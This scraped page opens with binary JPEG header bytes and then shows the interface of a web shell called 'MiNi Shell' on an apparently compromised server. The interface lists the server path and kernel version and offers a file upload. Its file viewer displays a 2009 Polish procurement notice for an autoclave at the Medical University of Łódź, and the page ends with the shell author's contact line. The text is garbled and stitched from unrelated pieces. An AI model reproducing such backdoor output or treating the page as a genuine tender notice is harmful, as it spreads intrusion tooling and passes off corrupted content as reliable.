JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/148237-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa i montaż autoklawu dla Uniwersytetu Medycznego w Łodzi ZP/82/2009</b><br>
<b>Numer ogłoszenia: 148237 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny , al. Kościuszki 4, 90-419 Łódź, woj. łódzkie, tel. 042 6302330, faks 042 6393952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umed.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż autoklawu dla Uniwersytetu Medycznego w Łodzi ZP/82/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa, montaż, podłączenie i uruchomienie autoklawu dla zwierzętarni zlokalizowanej w Łodzi przy ul. Muszyńskiego 1, szczegółowo opisanego w załączniku nr 2 do SIWZ - przedmiocie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.11.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 8 000,00 zł 
      słownie: osiem tysięcy złotych
      
2.	Ostateczny termin wniesienia wadium i doręczenia dowodu jego wniesienia upływa dnia 15.09.2009 r.  do godz. 09.00.

3.	Wadium może być wniesione w następujących formach: 

a.	pieniądzu - przelewem na konto:
      ING BANK ŚLĄSKI W ŁODZI 21 10501461 1000 0022 8237 8799 
      do dnia 15.09.2009 r. do godz. 09.00 


      z zaznaczeniem Wadium - ZP/82/2009 - Dostawa autoklawu

b.	poręczeniach bankowych (w postaci oryginału dokumentu) lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,

c.	gwarancjach bankowych (w postaci oryginału dokumentu) - gwarantowane na czas związania z ofertą,

d.	gwarancjach ubezpieczeniowych (w postaci oryginału dokumentu) - gwarantowane na czas związania z ofertą,

e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6B pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158, z późn. zm.)

4.	Zamawiający dokona niezwłocznie zwrotu wadium z chwilą gdy: 

a.	upłynął termin związania z ofertą, 

b.	zawarto umowę,

c.	Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

5.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy: 

a.	który wycofał ofertę przed upływem terminu składania oferty, który został wykluczony z postępowania, złożenie wniosku powoduje utratę prawa do wniesienia protestu,

b.	którego oferta została odrzucona, złożenie wniosku powoduje utratę prawa do wniesienia protestu,

c.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.

5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych     w ofercie,

b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,

c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn  leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:

1.  Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych.

    -  posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy  
       nakładają obowiązek posiadania takich uprawnień,

      -  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
         osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych 
         podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
    zamówienia:
o zamówienie ubiegać się mogą Wykonawcy, którzy w okresie ostatnich trzech 
lat od daty wszczęcia postępowania, a jeżeli okres działalności jest krótszy w tym okresie, zrealizowali (rozpoczęli i zakończyli) minimum jedną dostawę odpowiadającą swoim rodzajem
i wartością dostawie stanowiącej przedmiot zamówienia o wartości  brutto składanej oferty. 

    -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 

    -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 

Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty.
  
2.   W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy 
    ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
    albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

Zamawiający odrzuca ofertę Wykonawcy:

-  gdy jest ona niezgodna z ustawą,
-  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, a w szczególności 
   nie spełnia wszystkich wymogów - przedmiotu zamówienia,
-  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
   nieuczciwej konkurencji,
-  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
-  wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
-  zawiera błędy w obliczeniu ceny,
-  wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie 
   omyłki, o której mowa w art. 87 ust. 2 pkt 3,
-  nieważnej na podstawie odrębnych przepisów.

Warunki dodatkowe:

1.	Realizacja zamówienia odbywać się będzie w budynku, w którym prowadzone są roboty budowlano-montażowe. Zamawiający wymaga, przed złożeniem oferty, dokonania wizji lokalnej pomieszczeń przeznaczonych pod instalację urządzeń i uwzględnienia sugestii użytkownika związanych z przyszłą pracą aparatów. W celu dokonania wizji lokalnej należy skontaktować się z Biurem Inwestycji Uniwersytetu Medycznego w Łodzi, ul.Mazowiecka 15, tel. 0-42 678-87-58. Zamawiający będzie żądał dołączenia do oferty potwierdzenia odbycia wizji lokalnej.

2.	Instalacja urządzeń do istniejących elementów infrastruktury budynku bez dodatkowych  kosztów, wyłącznie po stronie Wykonawcy.

3.	Płatność: Zamawiający zobowiązuje się do zapłaty należności za dostarczony towar przelewem, w terminie 30 dni od momentu dostarczenia potwierdzonej faktury wraz 
z protokołem zdawczo-odbiorczym do siedziby Zamawiającego, Biura Obsługi i Realizacji Zamówień Publicznych, III piętro, pok. 20. 

4.	Czas trwania gwarancji (licząc od daty instalacji) - minimum 24 miesiące.

5.	Zamawiający zastrzega sobie prawo do zażądania wykonania prezentacji oferowanych urządzeń celem oceny zgodności zaoferowanego przedmiotu zamówienia ze SIWZ.

6.	Wykonawca musi wykazać się autoryzacjami producenta oferowanego sprzętu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz Oferty wg załącznika nr 1.

2.	Wypełniony Przedmiot zamówienia - wg załącznika nr 2.

3.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22
    ust. 1 prawa zamówień publicznych   załącznik nr 3.1

4.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 
    ust. 1 i  2 prawa zamówień publicznych - załączniki nr 3.2

5.	Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1:

5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  
      działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.2  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego 
      oddziału ZUS u lub KRUS-u potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5, składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, odpowiednio że: 

       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
       b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i   
           zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  
           na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  
           organu.
       
7.	Dokument, o którym mowa w pkt 6a powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 6b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 


    zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

9.	 W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie dla wspólnego pełnomocnika.

10.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie musi by w formie oryginału lub notarialnie poświadczonej kopii.

11.	Deklaracja zgodności CE lub inny dokument dopuszczający oferowany sprzęt do obrotu na terenie RP (odpis lub kopia, a jeśli została sporządzona w języku obcym musi być złożony wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę).

12.	Materiały  producenta  typu Product  Data lub opis przedmiotu zamówienia. Materiały typu Product Data lub materiały firmowe i informacje z parametrami technicznymi urządzenia ( posiadane katalogi, foldery, opisy przedmiotu zamówienia), potwierdzające spełnienie wymaganych parametrów technicznych zgodnie z opisem w SIWZ.

13.	Oświadczenie Wykonawcy, że oferowany sprzęt w przypadku wyboru oferty będzie dostarczony - fabrycznie nowy i bez wad fizycznych i prawnych - załącznik nr 5.

14.	Oświadczenie, że Wykonawca zobowiązuje się do bezpłatnych szkoleń personelu bezpośredniego użytkownika w zakresie obsługi zamontowanego urządzenia - jedno szkolenie po montażu, drugie szkolenie po miesiącu użytkowania, oraz do bezpłatnego szkolenia  pracowników Działu Aparatury Medycznej w zakresie czynności serwisowych - załącznik nr 6.

15.	Instrukcję obsługi w języku polskim.

16.	Dokument potwierdzający autoryzację Wykonawcy przez producenta oferowanego sprzętu.

17.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw (minimum jednej) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy  zostały wykonane należycie.

18.	Dokument potwierdzający odbycie wizji lokalnej pomieszczeń, w którym będzie montowane urządzenie.

19.	Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umed.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Uniwersytetu Medycznego w Łodzi, Al. Kościuszki 4  w Biurze Obsługi i Realizacji Zamówień Publicznych, III piętro, pok. 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Uniwersytetu Medycznego w Łodzi, Al. Kościuszki 4  w Biurze Obsługi i Realizacji Zamówień Publicznych, III piętro, pok. 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com